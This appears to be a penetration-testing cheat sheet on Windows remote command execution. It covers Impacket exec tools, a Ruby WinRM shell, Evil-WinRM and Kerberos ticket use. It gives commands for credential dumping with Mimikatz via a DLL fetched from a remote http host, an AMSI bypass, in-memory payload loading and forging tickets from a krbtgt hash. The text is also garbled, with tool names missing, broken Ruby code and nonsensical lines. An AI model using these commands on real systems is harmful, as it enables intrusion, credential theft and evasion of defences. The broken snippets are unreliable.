Remote Execution Techniques

Impacket tools
# psexec
# PSEXEC like functionality example using RemComSvc( domain/user:password@IP <command>
# smbexec
# A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. 
# Instantiating a local smbserver to receive the output of the commands. 
# This is useful in the situation where the target machine does NOT have a writeable share available. domain/user:password@IP <command>
# atexec
# This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command. domain/user:password@IP <command>
# wmiexec
# A semi-interactive shell, used through Windows Management Instrumentation. 
# It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy. domain/user:password@IP <command>
# dcomexec
# A semi-interactive shell similar to, but using different DCOM endpoints. 
##  Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects. domain/user:password@IP <command>


# You can use WinRM to execute remote commands and even get a shell
# Port 5985 needs to be opended
# Default endpoint is /wsman
require 'winrm'

conn = 
  endpoint: 'http://ip:5985/wsman',
  user: 'domain/user',
  password: 'password',

command="" do |shell|
    until command == "exit\n" do
        print "PS > "
        command = gets        
        output = do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
    puts "Exiting with code #{output.exitcode}"


# Evil-WinRM is another complete tool for WinRIM

# Simple usage
$ ruby evil-winrm.rb -i -u user -p password

# Upload and Download
> upload local_filename (destination_filename)
> download remote_filename (destination_filename)

# List all services showing if there your account has permissions over each one
> services

# Menu listing loaded modules (default presented below)
> menu 
# You can load local PS1 scripts just by typing script name
# The scripts must be in the path set at -s argument
> Powerview.ps1
> menu
# Using advanced commands

# Invoke-Binary
# Allows exes compiled from c# to be executed in memory
# The executables must be in the path set at -e argument
> Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'

# DLL Loader
# allows loading dll libraries in memory. The dll file can be hosted by smb, http or locally.
# You can then use auto-completion
> Dll-Loader -http -path http://xx.xx.xx.xx/sharpsploit.dll
> [Sharpsploit.Credentials.Mimikatz]::LogonPasswords()

# Donut Loader
# allows to inject x64 payloads generated with awesome donut technique
# No need to encode the payload.bin, just generate and inject
python3 covenant.exe

# Bypass-4MSI
# patchs AMSI protection
> amsiscanbuffer
> Bypass-4MSI
> amsiscanbuffer
# Using Kerberos

# First, date synchro
rdate -n <dc-ip>

# Ticket generation (ticketer, kirbi rubeus or mimikatz...) -dc-ip <dc_ip> -nthash <krbtgt_nthash> -domain-sid <domain_sid> -domain <domain_name> <user>
python ticket.kirbi ticket.ccache

# Add ccache ticket (2 ways)
export KRB5CCNAME=/foo/var/ticket.ccache
cp ticket.ccache /tmp/krb5cc_0

# Add realm to /etc/krb5.conf (for linux). Use of this format is important
             kdc =

# Check ticket